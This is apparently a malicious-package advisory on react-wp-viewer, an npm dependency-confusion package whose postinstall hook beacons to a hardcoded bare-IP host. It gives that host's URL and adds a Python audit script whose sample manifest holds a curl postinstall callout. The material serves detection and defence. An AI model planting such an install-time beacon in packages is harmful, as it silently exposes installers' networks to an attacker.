
MAL-2026-6571

Malicious code in react-wp-viewer (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (443f37b7957fe3f1d4dd836b3a0e6eeddb513e334700e0c0a4616570071c13d8)

react-wp-viewer 0.2.4 is a dependency-confusion package. Its postinstall hook performs an HTTP GET to a hardcoded bare-IP endpoint at http://130.49.177.51:18080/p/dc-20260627-yandex-geobase carrying the package name, version, and a fixed nonce. The package self-identifies as a dependency-confusion proof-of-concept (`__dependency_confusion_poc__: true`) and the URL path encodes a campaign identifier referencing an internal package namespace, indicating the public name is being squatted to win resolution against an identically-named private/internal package. Any build that resolves `react-wp-viewer` from the public registry will silently execute the postinstall beacon, disclosing the installer's source IP, hostname-derived network position, and the fact that this internal name resolves within their environment, to an attacker-controlled host over plain HTTP. No installer credentials are read in the traced code, but the install-time callout to an attacker-controlled IP is the dependency-confusion attack pattern and provides material reconnaissance value to the operator.


Affected packages

npm / react-wp-viewer
Introduced in: 0

No fixed version published yet for react-wp-viewer (npm). Pin to a known-safe version or switch to an alternative.
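The behaviour described above (an install-phase script that beacons to a hardcoded bare-IP HTTP endpoint, plus the `__dependency_confusion_poc__` marker in the manifest) is the kind of thing a defender can audit for in an installed `node_modules` tree before trusting a build. The following is an added example written for this page, not code from the advisory source or from the react-wp-viewer package: it scans every `package.json` under a directory, flags `preinstall`/`install`/`postinstall` scripts that reference a dotted-quad `http(s)://` host, and flags manifests carrying the PoC marker. The sample manifests at the bottom are constructed for the demonstration and use a documentation-range IP (192.0.2.10) and a made-up campaign path rather than the advisory's real indicator; a real audit would match the IP and path quoted above the same way.

```python
"""Audit installed npm packages for install-time scripts that contact bare-IP HTTP endpoints.

Added example for this advisory page; constructed sample data, not the real package's files.
"""
import json
import re
from pathlib import Path

# npm lifecycle scripts that run automatically during `npm install`
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# http(s):// followed by a dotted-quad host, optional :port, optional path
BARE_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/\S*)?")


def audit_manifest(manifest: dict) -> list[str]:
    """Return findings for one parsed package.json dict (empty list means nothing suspicious)."""
    findings = []
    name = manifest.get("name", "<unnamed>")
    version = manifest.get("version", "?")
    scripts = manifest.get("scripts") or {}

    # Only install-phase hooks run without the user invoking them explicitly
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for match in BARE_IP_URL.finditer(cmd):
            findings.append(
                f"{name}@{version}: {hook} script contacts bare-IP endpoint {match.group(0)}"
            )

    # Marker the advisory says the package sets on itself
    if manifest.get("__dependency_confusion_poc__") is True:
        findings.append(f"{name}@{version}: manifest self-identifies as dependency-confusion PoC")

    return findings


def audit_tree(node_modules: Path) -> list[str]:
    """Walk a node_modules directory and audit every package.json found in it."""
    findings = []
    for pkg_json in sorted(node_modules.rglob("package.json")):
        try:
            manifest = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or non-JSON file: skip rather than abort the audit
        if isinstance(manifest, dict):
            findings.extend(audit_manifest(manifest))
    return findings


# Constructed sample manifests (hypothetical values; the IP is from the 192.0.2.0/24 documentation range)
SAMPLE_MANIFESTS = {
    "suspicious": {
        "name": "react-wp-viewer",
        "version": "0.2.4",
        "__dependency_confusion_poc__": True,
        "scripts": {
            "postinstall": "curl -s http://192.0.2.10:18080/p/example-campaign"
        },
    },
    "clean": {
        "name": "some-ui-lib",
        "version": "1.4.2",
        "scripts": {"postinstall": "node scripts/build.js", "test": "jest"},
    },
}


def audit_samples() -> list[str]:
    """Run the audit over the constructed sample manifests and return all findings."""
    findings = []
    for manifest in SAMPLE_MANIFESTS.values():
        findings.extend(audit_manifest(manifest))
    return findings


if __name__ == "__main__":
    for line in audit_samples():
        print(line)
```

Running the module prints two findings, both against the constructed `react-wp-viewer` sample: the postinstall bare-IP callout and the PoC marker. To audit a real checkout, call `audit_tree(Path("node_modules"))`. Two standard npm controls complement this check: running installs with `ignore-scripts=true` in `.npmrc` so lifecycle hooks never execute, and pinning exact versions in the lockfile so a public package cannot silently take over a name the build expects from a private registry.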

References